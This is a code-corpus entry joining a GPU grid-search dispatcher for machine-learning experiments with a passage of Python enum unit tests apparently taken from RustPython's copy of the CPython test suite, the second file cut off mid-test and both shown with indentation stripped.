from sandstone.utils.generic import md5
EXPERIMENT_CRASH_MSG = "ALERT! job:[{}] has crashed! Check logfile at:[{}]"
CONFIG_NOT_FOUND_MSG = "ALERT! {} config {} file does not exist!"
RESULTS_PATH_APPEAR_ERR = 'results_path should not appear in config. It will be determined automatically per job'
SUCCESSFUL_SEARCH_STR = "SUCCESS! Grid search results dumped to {}"
LOG_KEYS = ['results_path', 'model_path', 'log_path']
parser = argparse.ArgumentParser(description='Grid Search Dispatcher. ')
parser.add_argument("config_path", type=str, nargs='+', help="Path of experiment config(s)")
parser.add_argument('--log_dir', type=str, default="logs", help="path to store logs and detailed job level result files")
parser.add_argument('--result_path', type=str, default="results/grid_search.csv", help="path to store grid_search table. This is preferably on shared storage")
parser.add_argument('--sort_key', type=str, default="dev_loss", help="How to sort csv")
parser.add_argument('--rerun', action='store_true', default=False, help='whether to rerun experiments with the same result file location')
parser.add_argument('--shuffle', action='store_true', default=False, help='whether to shuffle order of experiments')
parser.add_argument('--dry_run', action='store_true', default=False, help='whether to not actually run the jobs')
parser.add_argument('--gpus', type=str, nargs='+', default=None, help="GPUs to use. Overrides available_gpus.")
def launch_experiment(args, gpu, worker_args, flag_string):
'''
Launch an experiment and direct logs and results to a unique filepath.
Alert if something goes wrong.
:args: parsed dispatcher arguments.
:gpu: gpu to run this job on.
:worker_args: optional distributed settings (master host/port) forwarded to the job.
:flag_string: flags to use for this model run. Will be fed into
scripts/main.py
'''
if not os.path.isdir(args.log_dir):
os.makedirs(args.log_dir)
log_name = md5(flag_string)
log_stem = os.path.join(args.log_dir, log_name)
log_path = '{}.txt'.format(log_stem)
results_path = "{}.results".format(log_stem)
experiment_string = "CUDA_VISIBLE_DEVICES={} python -u scripts/main.py {} --results_path {}".format(
gpu, flag_string, results_path)
if 'port' in worker_args:
experiment_string += ' --master_port {}'.format(worker_args['port'])
if 'host' in worker_args:
experiment_string += ' --master_host {}'.format(worker_args['host'])
# forward logs to logfile
if "--resume" in flag_string and not args.rerun:
pipe_str = ">>"
else:
pipe_str = ">"
shell_cmd = "{} {} {} 2>&1".format(experiment_string, pipe_str, log_path)
print("Launched exp: {}".format(shell_cmd))
if not os.path.exists(results_path) or args.rerun:
if not args.dry_run:
subprocess.call(shell_cmd, shell=True)
if not os.path.exists(results_path):
# running this process failed, alert me
job_fail_msg = EXPERIMENT_CRASH_MSG.format(experiment_string, log_path)
print(job_fail_msg)
return results_path, log_path
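# Illustrative sketch of the shell command launch_experiment assembles (the
# flag values here are hypothetical; the <md5> stem is computed from the full
# flag string, so identical configs map to identical log/result paths):
#   CUDA_VISIBLE_DEVICES=0 python -u scripts/main.py --lr 0.001 \
#       --results_path logs/<md5>.results > logs/<md5>.txt 2>&1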
def worker(args, gpu, worker_args, job_queue, done_queue):
'''
Worker process pinned to one gpu. Consumes jobs from job_queue and pushes
results to done_queue until the queue is drained.
:gpu - gpu this worker can access.
:job_queue - queue of available jobs.
:done_queue - queue where to push results.
'''
while not job_queue.empty():
params = job_queue.get()
if params is None:
return
done_queue.put(
launch_experiment(args, gpu, worker_args, params))
def get_summary_dict_from_run(result_path, log_path, experiment_axies):
summary_dict = OrderedDict()
try:
result_dict = pickle.load(open(result_path, 'rb'))
except Exception:
print("Experiment failed! Logs are located at: {}".format(log_path))
return summary_dict
result_dict['log_path'] = log_path
for k in experiment_axies:
summary_dict[k] = result_dict[k]
splits = []
for key in ['eval_train', 'dev', 'test']:
if result_dict[key]:
splits.append(key)
for split in splits:
split_path = '{}.{}_.metrics'.format(result_path, split)
stats = pickle.load(open(split_path, 'rb'))
for k, v in stats.items():
if isinstance(v, (float, int)):
summary_dict["{}_{}".format(split, k)] = v
for k in LOG_KEYS:
summary_dict[k] = result_dict[k]
return summary_dict
def collate_all_summaries(summary_dict, summary_dict_list, experiment_axies, args):
if len(summary_dict_list) == 0:
summary_columns = list(summary_dict.keys())
summary_dict_list = [summary_dict]
return summary_dict_list, summary_columns
## Assume that summary dict list already has all columns merged
prior_result = summary_dict_list[-1]
prior_columns = list(prior_result.keys())
current_columns = list(summary_dict.keys())
summary_columns = copy.deepcopy(experiment_axies)
for split in ['train', 'dev', 'test']:
for col_list in [prior_columns, current_columns]:
for key in col_list:
if split in key and key not in summary_columns:
summary_columns.append(key)
summary_columns.extend(LOG_KEYS)
summary_dict_list.append(summary_dict)
for summary in summary_dict_list:
for key in summary_columns:
if key not in summary:
summary[key] = 'NA'
if args.sort_key in summary_dict_list[-1]:
summary_dict_list = sorted(summary_dict_list, key=lambda k: k[args.sort_key])
else:
print("Warning: Sort key {} not seen in result files".format(args.sort_key))
return summary_dict_list, summary_columns
def update_summary_with_results(result_path, log_path, experiment_axies, summary_dict_list, args):
assert result_path is not None
summary_dict = get_summary_dict_from_run(result_path, log_path, experiment_axies)
summary_dict_list, summary_columns = collate_all_summaries(summary_dict, summary_dict_list, experiment_axies, args)
result_dir = os.path.dirname(args.result_path)
if not os.path.isdir(result_dir):
os.makedirs(result_dir)
# Write summary to csv
with open(args.result_path, 'w') as out_file:
writer = csv.DictWriter(out_file, fieldnames=summary_columns)
writer.writeheader()
for experiment in summary_dict_list:
writer.writerow(experiment)
return summary_dict_list
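# The resulting CSV has one row per finished job, with columns ordered as
# experiment axes first, then every train/dev/test metric seen in any run
# (missing cells filled with 'NA'), then the LOG_KEYS paths. A sketch of the
# layout, with hypothetical axis and metric names:
#   lr,dropout,dev_loss,test_loss,results_path,model_path,log_path
#   0.001,0.1,0.42,0.45,logs/ab12.results,snapshots/ab12,logs/ab12.txt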
if __name__ == "__main__":
args = parser.parse_args()
# load configs, perform sanity checks
configs = []
gpus = args.gpus
for i, config_path in enumerate(args.config_path):
if not os.path.exists(config_path):
print(CONFIG_NOT_FOUND_MSG.format("experiment", config_path))
sys.exit(1)
config = json.load(open(config_path, 'r'))
if 'results_path' in config['search_space']:
print(RESULTS_PATH_APPEAR_ERR)
sys.exit(1)
if args.gpus is None:
if i == 0:
gpus = config['available_gpus']
else:
assert config['available_gpus'] == gpus, "Found mismatch in available gpus! {} != {}, Path = {}".format(gpus, config['available_gpus'], config_path)
configs.append(config)
# construct job list
job_list = []
experiment_axies = []
for config in configs:
config_job_list, config_experiment_axies = parsing.parse_dispatcher_config(config)
job_list.extend(config_job_list)
# Merge experiment axes across configs, preserving order (resolves the old TODO).
for axis in config_experiment_axies:
if axis not in experiment_axies:
experiment_axies.append(axis)
if args.shuffle:
random.shuffle(job_list)
job_queue = multiprocessing.Queue()
done_queue = multiprocessing.Queue()
for job in job_list:
job_queue.put(job)
print("Launching Dispatcher with {} jobs!".format(len(job_list)))
print()
for worker_indx, gpu in enumerate(gpus):
print("Start gpu worker {}".format(gpu))
worker_args = {}
multiprocessing.Process(target=worker, args=(args, gpu, worker_args, job_queue, done_queue)).start()
print()
for i in range(len(job_list)):
result_path, log_path = done_queue.get()
dump_result_string = SUCCESSFUL_SEARCH_STR.format(args.result_path)
print("({}/{}) \t {}".format(i+1, len(job_list), dump_result_string))
|
test_enum.py | import enum
import inspect
import pydoc
import sys
import unittest
import threading
from collections import OrderedDict
from enum import Enum, IntEnum, EnumMeta, Flag, IntFlag, unique, auto
from io import StringIO
from pickle import dumps, loads, PicklingError, HIGHEST_PROTOCOL
from test import support
from datetime import timedelta
# for pickle tests
try:
class Stooges(Enum):
LARRY = 1
CURLY = 2
MOE = 3
except Exception as exc:
Stooges = exc
try:
class IntStooges(int, Enum):
LARRY = 1
CURLY = 2
MOE = 3
except Exception as exc:
IntStooges = exc
try:
class FloatStooges(float, Enum):
LARRY = 1.39
CURLY = 2.72
MOE = 3.142596
except Exception as exc:
FloatStooges = exc
try:
class FlagStooges(Flag):
LARRY = 1
CURLY = 2
MOE = 3
except Exception as exc:
FlagStooges = exc
# for pickle test and subclass tests
try:
class StrEnum(str, Enum):
'accepts only string values'
class Name(StrEnum):
BDFL = 'Guido van Rossum'
FLUFL = 'Barry Warsaw'
except Exception as exc:
Name = exc
try:
Question = Enum('Question', 'who what when where why', module=__name__)
except Exception as exc:
Question = exc
try:
Answer = Enum('Answer', 'him this then there because')
except Exception as exc:
Answer = exc
try:
Theory = Enum('Theory', 'rule law supposition', qualname='spanish_inquisition')
except Exception as exc:
Theory = exc
# for doctests
try:
class Fruit(Enum):
TOMATO = 1
BANANA = 2
CHERRY = 3
except Exception:
pass
def test_pickle_dump_load(assertion, source, target=None):
if target is None:
target = source
for protocol in range(HIGHEST_PROTOCOL + 1):
assertion(loads(dumps(source, protocol=protocol)), target)
def test_pickle_exception(assertion, exception, obj):
for protocol in range(HIGHEST_PROTOCOL + 1):
with assertion(exception):
dumps(obj, protocol=protocol)
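# Usage sketch for the two helpers above, inside a TestCase (mirrors the
# pickle tests further down):
#   test_pickle_dump_load(self.assertIs, Stooges.CURLY)   # member round-trips
#   test_pickle_dump_load(self.assertIs, Stooges)         # so does the class
#   test_pickle_exception(self.assertRaises, TypeError, BadPickle.dill)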
class TestHelpers(unittest.TestCase):
# _is_descriptor, _is_sunder, _is_dunder
def test_is_descriptor(self):
class foo:
pass
for attr in ('__get__','__set__','__delete__'):
obj = foo()
self.assertFalse(enum._is_descriptor(obj))
setattr(obj, attr, 1)
self.assertTrue(enum._is_descriptor(obj))
def test_is_sunder(self):
for s in ('_a_', '_aa_'):
self.assertTrue(enum._is_sunder(s))
for s in ('a', 'a_', '_a', '__a', 'a__', '__a__', '_a__', '__a_', '_',
'__', '___', '____', '_____',):
self.assertFalse(enum._is_sunder(s))
def test_is_dunder(self):
for s in ('__a__', '__aa__'):
self.assertTrue(enum._is_dunder(s))
for s in ('a', 'a_', '_a', '__a', 'a__', '_a_', '_a__', '__a_', '_',
'__', '___', '____', '_____',):
self.assertFalse(enum._is_dunder(s))
# for subclassing tests
class classproperty:
def __init__(self, fget=None, fset=None, fdel=None, doc=None):
self.fget = fget
self.fset = fset
self.fdel = fdel
if doc is None and fget is not None:
doc = fget.__doc__
self.__doc__ = doc
def __get__(self, instance, ownerclass):
return self.fget(ownerclass)
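# Minimal usage sketch for classproperty (hypothetical enum, not part of the
# suite): because classproperty defines __get__, the enum machinery treats it
# as a descriptor rather than a member, so it works on Enum subclasses:
#   class Color(Enum):
#       RED = 1
#       @classproperty
#       def default(cls):
#           return cls.RED
#   assert Color.default is Color.RED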
# tests
class TestEnum(unittest.TestCase):
def setUp(self):
class Season(Enum):
SPRING = 1
SUMMER = 2
AUTUMN = 3
WINTER = 4
self.Season = Season
class Konstants(float, Enum):
E = 2.7182818
PI = 3.1415926
TAU = 2 * PI
self.Konstants = Konstants
class Grades(IntEnum):
A = 5
B = 4
C = 3
D = 2
F = 0
self.Grades = Grades
class Directional(str, Enum):
EAST = 'east'
WEST = 'west'
NORTH = 'north'
SOUTH = 'south'
self.Directional = Directional
from datetime import date
class Holiday(date, Enum):
NEW_YEAR = 2013, 1, 1
IDES_OF_MARCH = 2013, 3, 15
self.Holiday = Holiday
def test_dir_on_class(self):
Season = self.Season
self.assertEqual(
set(dir(Season)),
set(['__class__', '__doc__', '__members__', '__module__',
'SPRING', 'SUMMER', 'AUTUMN', 'WINTER']),
)
def test_dir_on_item(self):
Season = self.Season
self.assertEqual(
set(dir(Season.WINTER)),
set(['__class__', '__doc__', '__module__', 'name', 'value']),
)
def test_dir_with_added_behavior(self):
class Test(Enum):
this = 'that'
these = 'those'
def wowser(self):
return ("Wowser! I'm %s!" % self.name)
self.assertEqual(
set(dir(Test)),
set(['__class__', '__doc__', '__members__', '__module__', 'this', 'these']),
)
self.assertEqual(
set(dir(Test.this)),
set(['__class__', '__doc__', '__module__', 'name', 'value', 'wowser']),
)
def test_dir_on_sub_with_behavior_on_super(self):
# see issue22506
class SuperEnum(Enum):
def invisible(self):
return "did you see me?"
class SubEnum(SuperEnum):
sample = 5
self.assertEqual(
set(dir(SubEnum.sample)),
set(['__class__', '__doc__', '__module__', 'name', 'value', 'invisible']),
)
def test_dir_on_sub_with_behavior_including_instance_dict_on_super(self):
# see issue40084
class SuperEnum(IntEnum):
def __new__(cls, value, description=""):
obj = int.__new__(cls, value)
obj._value_ = value
obj.description = description
return obj
class SubEnum(SuperEnum):
sample = 5
self.assertTrue({'description'} <= set(dir(SubEnum.sample)))
def test_enum_in_enum_out(self):
Season = self.Season
self.assertIs(Season(Season.WINTER), Season.WINTER)
def test_enum_value(self):
Season = self.Season
self.assertEqual(Season.SPRING.value, 1)
def test_intenum_value(self):
self.assertEqual(IntStooges.CURLY.value, 2)
def test_enum(self):
Season = self.Season
lst = list(Season)
self.assertEqual(len(lst), len(Season))
self.assertEqual(len(Season), 4, Season)
self.assertEqual(
[Season.SPRING, Season.SUMMER, Season.AUTUMN, Season.WINTER], lst)
for i, season in enumerate('SPRING SUMMER AUTUMN WINTER'.split(), 1):
e = Season(i)
self.assertEqual(e, getattr(Season, season))
self.assertEqual(e.value, i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, season)
self.assertIn(e, Season)
self.assertIs(type(e), Season)
self.assertIsInstance(e, Season)
self.assertEqual(str(e), 'Season.' + season)
self.assertEqual(
repr(e),
'<Season.{0}: {1}>'.format(season, i),
)
def test_value_name(self):
Season = self.Season
self.assertEqual(Season.SPRING.name, 'SPRING')
self.assertEqual(Season.SPRING.value, 1)
with self.assertRaises(AttributeError):
Season.SPRING.name = 'invierno'
with self.assertRaises(AttributeError):
Season.SPRING.value = 2
def test_changing_member(self):
Season = self.Season
with self.assertRaises(AttributeError):
Season.WINTER = 'really cold'
def test_attribute_deletion(self):
class Season(Enum):
SPRING = 1
SUMMER = 2
AUTUMN = 3
WINTER = 4
def spam(cls):
pass
self.assertTrue(hasattr(Season, 'spam'))
del Season.spam
self.assertFalse(hasattr(Season, 'spam'))
with self.assertRaises(AttributeError):
del Season.SPRING
with self.assertRaises(AttributeError):
del Season.DRY
with self.assertRaises(AttributeError):
del Season.SPRING.name
def test_bool_of_class(self):
class Empty(Enum):
pass
self.assertTrue(bool(Empty))
def test_bool_of_member(self):
class Count(Enum):
zero = 0
one = 1
two = 2
for member in Count:
self.assertTrue(bool(member))
def test_invalid_names(self):
with self.assertRaises(ValueError):
class Wrong(Enum):
mro = 9
with self.assertRaises(ValueError):
class Wrong(Enum):
_create_ = 11
with self.assertRaises(ValueError):
class Wrong(Enum):
_get_mixins_ = 9
with self.assertRaises(ValueError):
class Wrong(Enum):
_find_new_ = 1
with self.assertRaises(ValueError):
class Wrong(Enum):
_any_name_ = 9
def test_bool(self):
# plain Enum members are always True
class Logic(Enum):
true = True
false = False
self.assertTrue(Logic.true)
self.assertTrue(Logic.false)
# unless overridden
class RealLogic(Enum):
true = True
false = False
def __bool__(self):
return bool(self._value_)
self.assertTrue(RealLogic.true)
self.assertFalse(RealLogic.false)
# mixed Enums depend on mixed-in type
class IntLogic(int, Enum):
true = 1
false = 0
self.assertTrue(IntLogic.true)
self.assertFalse(IntLogic.false)
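# Summary of the three truthiness regimes exercised above (sketch):
#   bool(Logic.false)      # True  - plain Enum members are always truthy
#   bool(RealLogic.false)  # False - a __bool__ override consults the value
#   bool(IntLogic.false)   # False - an int mixin inherits int truthiness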
def test_contains(self):
Season = self.Season
self.assertIn(Season.AUTUMN, Season)
with self.assertRaises(TypeError):
3 in Season
with self.assertRaises(TypeError):
'AUTUMN' in Season
val = Season(3)
self.assertIn(val, Season)
class OtherEnum(Enum):
one = 1; two = 2
self.assertNotIn(OtherEnum.two, Season)
def test_comparisons(self):
Season = self.Season
with self.assertRaises(TypeError):
Season.SPRING < Season.WINTER
with self.assertRaises(TypeError):
Season.SPRING > 4
self.assertNotEqual(Season.SPRING, 1)
class Part(Enum):
SPRING = 1
CLIP = 2
BARREL = 3
self.assertNotEqual(Season.SPRING, Part.SPRING)
with self.assertRaises(TypeError):
Season.SPRING < Part.CLIP
def test_enum_duplicates(self):
class Season(Enum):
SPRING = 1
SUMMER = 2
AUTUMN = FALL = 3
WINTER = 4
ANOTHER_SPRING = 1
lst = list(Season)
self.assertEqual(
lst,
[Season.SPRING, Season.SUMMER,
Season.AUTUMN, Season.WINTER,
])
self.assertIs(Season.FALL, Season.AUTUMN)
self.assertEqual(Season.FALL.value, 3)
self.assertEqual(Season.AUTUMN.value, 3)
self.assertIs(Season(3), Season.AUTUMN)
self.assertIs(Season(1), Season.SPRING)
self.assertEqual(Season.FALL.name, 'AUTUMN')
self.assertEqual(
[k for k,v in Season.__members__.items() if v.name != k],
['FALL', 'ANOTHER_SPRING'],
)
def test_duplicate_name(self):
with self.assertRaises(TypeError):
class Color(Enum):
red = 1
green = 2
blue = 3
red = 4
with self.assertRaises(TypeError):
class Color(Enum):
red = 1
green = 2
blue = 3
def red(self):
return 'red'
with self.assertRaises(TypeError):
class Color(Enum):
@property
def red(self):
return 'redder'
red = 1
green = 2
blue = 3
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_enum_with_value_name(self):
class Huh(Enum):
name = 1
value = 2
self.assertEqual(
list(Huh),
[Huh.name, Huh.value],
)
self.assertIs(type(Huh.name), Huh)
self.assertEqual(Huh.name.name, 'name')
self.assertEqual(Huh.name.value, 1)
def test_format_enum(self):
Season = self.Season
self.assertEqual('{}'.format(Season.SPRING),
'{}'.format(str(Season.SPRING)))
self.assertEqual( '{:}'.format(Season.SPRING),
'{:}'.format(str(Season.SPRING)))
self.assertEqual('{:20}'.format(Season.SPRING),
'{:20}'.format(str(Season.SPRING)))
self.assertEqual('{:^20}'.format(Season.SPRING),
'{:^20}'.format(str(Season.SPRING)))
self.assertEqual('{:>20}'.format(Season.SPRING),
'{:>20}'.format(str(Season.SPRING)))
self.assertEqual('{:<20}'.format(Season.SPRING),
'{:<20}'.format(str(Season.SPRING)))
def test_str_override_enum(self):
class EnumWithStrOverrides(Enum):
one = auto()
two = auto()
def __str__(self):
return 'Str!'
self.assertEqual(str(EnumWithStrOverrides.one), 'Str!')
self.assertEqual('{}'.format(EnumWithStrOverrides.one), 'Str!')
def test_format_override_enum(self):
class EnumWithFormatOverride(Enum):
one = 1.0
two = 2.0
def __format__(self, spec):
return 'Format!!'
self.assertEqual(str(EnumWithFormatOverride.one), 'EnumWithFormatOverride.one')
self.assertEqual('{}'.format(EnumWithFormatOverride.one), 'Format!!')
def test_str_and_format_override_enum(self):
class EnumWithStrFormatOverrides(Enum):
one = auto()
two = auto()
def __str__(self):
return 'Str!'
def __format__(self, spec):
return 'Format!'
self.assertEqual(str(EnumWithStrFormatOverrides.one), 'Str!')
self.assertEqual('{}'.format(EnumWithStrFormatOverrides.one), 'Format!')
def test_str_override_mixin(self):
class MixinEnumWithStrOverride(float, Enum):
one = 1.0
two = 2.0
def __str__(self):
return 'Overridden!'
self.assertEqual(str(MixinEnumWithStrOverride.one), 'Overridden!')
self.assertEqual('{}'.format(MixinEnumWithStrOverride.one), 'Overridden!')
def test_str_and_format_override_mixin(self):
class MixinWithStrFormatOverrides(float, Enum):
one = 1.0
two = 2.0
def __str__(self):
return 'Str!'
def __format__(self, spec):
return 'Format!'
self.assertEqual(str(MixinWithStrFormatOverrides.one), 'Str!')
self.assertEqual('{}'.format(MixinWithStrFormatOverrides.one), 'Format!')
def test_format_override_mixin(self):
class TestFloat(float, Enum):
one = 1.0
two = 2.0
def __format__(self, spec):
return 'TestFloat success!'
self.assertEqual(str(TestFloat.one), 'TestFloat.one')
self.assertEqual('{}'.format(TestFloat.one), 'TestFloat success!')
def assertFormatIsValue(self, spec, member):
self.assertEqual(spec.format(member), spec.format(member.value))
def test_format_enum_date(self):
Holiday = self.Holiday
self.assertFormatIsValue('{}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:20}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:^20}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:>20}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:<20}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:%Y %m}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:%Y %m %M:00}', Holiday.IDES_OF_MARCH)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_format_enum_float(self):
Konstants = self.Konstants
self.assertFormatIsValue('{}', Konstants.TAU)
self.assertFormatIsValue('{:}', Konstants.TAU)
self.assertFormatIsValue('{:20}', Konstants.TAU)
self.assertFormatIsValue('{:^20}', Konstants.TAU)
self.assertFormatIsValue('{:>20}', Konstants.TAU)
self.assertFormatIsValue('{:<20}', Konstants.TAU)
self.assertFormatIsValue('{:n}', Konstants.TAU)
self.assertFormatIsValue('{:5.2}', Konstants.TAU)
self.assertFormatIsValue('{:f}', Konstants.TAU)
def test_format_enum_int(self):
Grades = self.Grades
self.assertFormatIsValue('{}', Grades.C)
self.assertFormatIsValue('{:}', Grades.C)
self.assertFormatIsValue('{:20}', Grades.C)
self.assertFormatIsValue('{:^20}', Grades.C)
self.assertFormatIsValue('{:>20}', Grades.C)
self.assertFormatIsValue('{:<20}', Grades.C)
self.assertFormatIsValue('{:+}', Grades.C)
self.assertFormatIsValue('{:08X}', Grades.C)
self.assertFormatIsValue('{:b}', Grades.C)
def test_format_enum_str(self):
Directional = self.Directional
self.assertFormatIsValue('{}', Directional.WEST)
self.assertFormatIsValue('{:}', Directional.WEST)
self.assertFormatIsValue('{:20}', Directional.WEST)
self.assertFormatIsValue('{:^20}', Directional.WEST)
self.assertFormatIsValue('{:>20}', Directional.WEST)
self.assertFormatIsValue('{:<20}', Directional.WEST)
def test_object_str_override(self):
class Colors(Enum):
RED, GREEN, BLUE = 1, 2, 3
def __repr__(self):
return "test.%s" % (self._name_, )
__str__ = object.__str__
self.assertEqual(str(Colors.RED), 'test.RED')
def test_enum_str_override(self):
class MyStrEnum(Enum):
def __str__(self):
return 'MyStr'
class MyMethodEnum(Enum):
def hello(self):
return 'Hello! My name is %s' % self.name
class Test1Enum(MyMethodEnum, int, MyStrEnum):
One = 1
Two = 2
self.assertTrue(Test1Enum._member_type_ is int)
self.assertEqual(str(Test1Enum.One), 'MyStr')
self.assertEqual(format(Test1Enum.One, ''), 'MyStr')
#
class Test2Enum(MyStrEnum, MyMethodEnum):
One = 1
Two = 2
self.assertEqual(str(Test2Enum.One), 'MyStr')
self.assertEqual(format(Test1Enum.One, ''), 'MyStr')
def test_inherited_data_type(self):
class HexInt(int):
def __repr__(self):
return hex(self)
class MyEnum(HexInt, enum.Enum):
A = 1
B = 2
C = 3
self.assertEqual(repr(MyEnum.A), '<MyEnum.A: 0x1>')
def test_too_many_data_types(self):
with self.assertRaisesRegex(TypeError, 'too many data types'):
class Huh(str, int, Enum):
One = 1
class MyStr(str):
def hello(self):
return 'hello, %s' % self
class MyInt(int):
def repr(self):
return hex(self)
with self.assertRaisesRegex(TypeError, 'too many data types'):
class Huh(MyStr, MyInt, Enum):
One = 1
def test_hash(self):
Season = self.Season
dates = {}
dates[Season.WINTER] = '1225'
dates[Season.SPRING] = '0315'
dates[Season.SUMMER] = '0704'
dates[Season.AUTUMN] = '1031'
self.assertEqual(dates[Season.AUTUMN], '1031')
def test_intenum_from_scratch(self):
class phy(int, Enum):
pi = 3
tau = 2 * pi
self.assertTrue(phy.pi < phy.tau)
def test_intenum_inherited(self):
class IntEnum(int, Enum):
pass
class phy(IntEnum):
pi = 3
tau = 2 * pi
self.assertTrue(phy.pi < phy.tau)
def test_floatenum_from_scratch(self):
class phy(float, Enum):
pi = 3.1415926
tau = 2 * pi
self.assertTrue(phy.pi < phy.tau)
def test_floatenum_inherited(self):
class FloatEnum(float, Enum):
pass
class phy(FloatEnum):
pi = 3.1415926
tau = 2 * pi
self.assertTrue(phy.pi < phy.tau)
def test_strenum_from_scratch(self):
class phy(str, Enum):
pi = 'Pi'
tau = 'Tau'
self.assertTrue(phy.pi < phy.tau)
def test_strenum_inherited(self):
class StrEnum(str, Enum):
pass
class phy(StrEnum):
pi = 'Pi'
tau = 'Tau'
self.assertTrue(phy.pi < phy.tau)
def test_intenum(self):
class WeekDay(IntEnum):
SUNDAY = 1
MONDAY = 2
TUESDAY = 3
WEDNESDAY = 4
THURSDAY = 5
FRIDAY = 6
SATURDAY = 7
self.assertEqual(['a', 'b', 'c'][WeekDay.MONDAY], 'c')
self.assertEqual([i for i in range(WeekDay.TUESDAY)], [0, 1, 2])
lst = list(WeekDay)
self.assertEqual(len(lst), len(WeekDay))
self.assertEqual(len(WeekDay), 7)
target = 'SUNDAY MONDAY TUESDAY WEDNESDAY THURSDAY FRIDAY SATURDAY'
target = target.split()
for i, weekday in enumerate(target, 1):
e = WeekDay(i)
self.assertEqual(e, i)
self.assertEqual(int(e), i)
self.assertEqual(e.name, weekday)
self.assertIn(e, WeekDay)
self.assertEqual(lst.index(e)+1, i)
self.assertTrue(0 < e < 8)
self.assertIs(type(e), WeekDay)
self.assertIsInstance(e, int)
self.assertIsInstance(e, Enum)
def test_intenum_duplicates(self):
class WeekDay(IntEnum):
SUNDAY = 1
MONDAY = 2
TUESDAY = TEUSDAY = 3
WEDNESDAY = 4
THURSDAY = 5
FRIDAY = 6
SATURDAY = 7
self.assertIs(WeekDay.TEUSDAY, WeekDay.TUESDAY)
self.assertEqual(WeekDay(3).name, 'TUESDAY')
self.assertEqual([k for k,v in WeekDay.__members__.items()
if v.name != k], ['TEUSDAY', ])
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_intenum_from_bytes(self):
self.assertIs(IntStooges.from_bytes(b'\x00\x03', 'big'), IntStooges.MOE)
with self.assertRaises(ValueError):
IntStooges.from_bytes(b'\x00\x05', 'big')
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_floatenum_fromhex(self):
h = float.hex(FloatStooges.MOE.value)
self.assertIs(FloatStooges.fromhex(h), FloatStooges.MOE)
h = float.hex(FloatStooges.MOE.value + 0.01)
with self.assertRaises(ValueError):
FloatStooges.fromhex(h)
def test_pickle_enum(self):
if isinstance(Stooges, Exception):
raise Stooges
test_pickle_dump_load(self.assertIs, Stooges.CURLY)
test_pickle_dump_load(self.assertIs, Stooges)
def test_pickle_int(self):
if isinstance(IntStooges, Exception):
raise IntStooges
test_pickle_dump_load(self.assertIs, IntStooges.CURLY)
test_pickle_dump_load(self.assertIs, IntStooges)
def test_pickle_float(self):
if isinstance(FloatStooges, Exception):
raise FloatStooges
test_pickle_dump_load(self.assertIs, FloatStooges.CURLY)
test_pickle_dump_load(self.assertIs, FloatStooges)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_pickle_enum_function(self):
if isinstance(Answer, Exception):
raise Answer
test_pickle_dump_load(self.assertIs, Answer.him)
test_pickle_dump_load(self.assertIs, Answer)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_pickle_enum_function_with_module(self):
if isinstance(Question, Exception):
raise Question
test_pickle_dump_load(self.assertIs, Question.who)
test_pickle_dump_load(self.assertIs, Question)
def test_enum_function_with_qualname(self):
if isinstance(Theory, Exception):
raise Theory
self.assertEqual(Theory.__qualname__, 'spanish_inquisition')
def test_class_nested_enum_and_pickle_protocol_four(self):
# would normally just have this directly in the class namespace
class NestedEnum(Enum):
twigs = 'common'
shiny = 'rare'
self.__class__.NestedEnum = NestedEnum
self.NestedEnum.__qualname__ = '%s.NestedEnum' % self.__class__.__name__
test_pickle_dump_load(self.assertIs, self.NestedEnum.twigs)
def test_pickle_by_name(self):
class ReplaceGlobalInt(IntEnum):
ONE = 1
TWO = 2
ReplaceGlobalInt.__reduce_ex__ = enum._reduce_ex_by_name
for proto in range(HIGHEST_PROTOCOL):
self.assertEqual(ReplaceGlobalInt.TWO.__reduce_ex__(proto), 'TWO')
def test_exploding_pickle(self):
BadPickle = Enum(
'BadPickle', 'dill sweet bread-n-butter', module=__name__)
globals()['BadPickle'] = BadPickle
# now break BadPickle to test exception raising
enum._make_class_unpicklable(BadPickle)
test_pickle_exception(self.assertRaises, TypeError, BadPickle.dill)
test_pickle_exception(self.assertRaises, PicklingError, BadPickle)
def test_string_enum(self):
class SkillLevel(str, Enum):
master = 'what is the sound of one hand clapping?'
journeyman = 'why did the chicken cross the road?'
apprentice = 'knock, knock!'
self.assertEqual(SkillLevel.apprentice, 'knock, knock!')
def test_getattr_getitem(self):
class Period(Enum):
morning = 1
noon = 2
evening = 3
night = 4
self.assertIs(Period(2), Period.noon)
self.assertIs(getattr(Period, 'night'), Period.night)
self.assertIs(Period['morning'], Period.morning)
def test_getattr_dunder(self):
Season = self.Season
self.assertTrue(getattr(Season, '__eq__'))
def test_iteration_order(self):
class Season(Enum):
SUMMER = 2
WINTER = 4
AUTUMN = 3
SPRING = 1
self.assertEqual(
list(Season),
[Season.SUMMER, Season.WINTER, Season.AUTUMN, Season.SPRING],
)
def test_reversed_iteration_order(self):
self.assertEqual(
list(reversed(self.Season)),
[self.Season.WINTER, self.Season.AUTUMN, self.Season.SUMMER,
self.Season.SPRING]
)
def test_programmatic_function_string(self):
SummerMonth = Enum('SummerMonth', 'june july august')
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_string_with_start(self):
SummerMonth = Enum('SummerMonth', 'june july august', start=10)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 10):
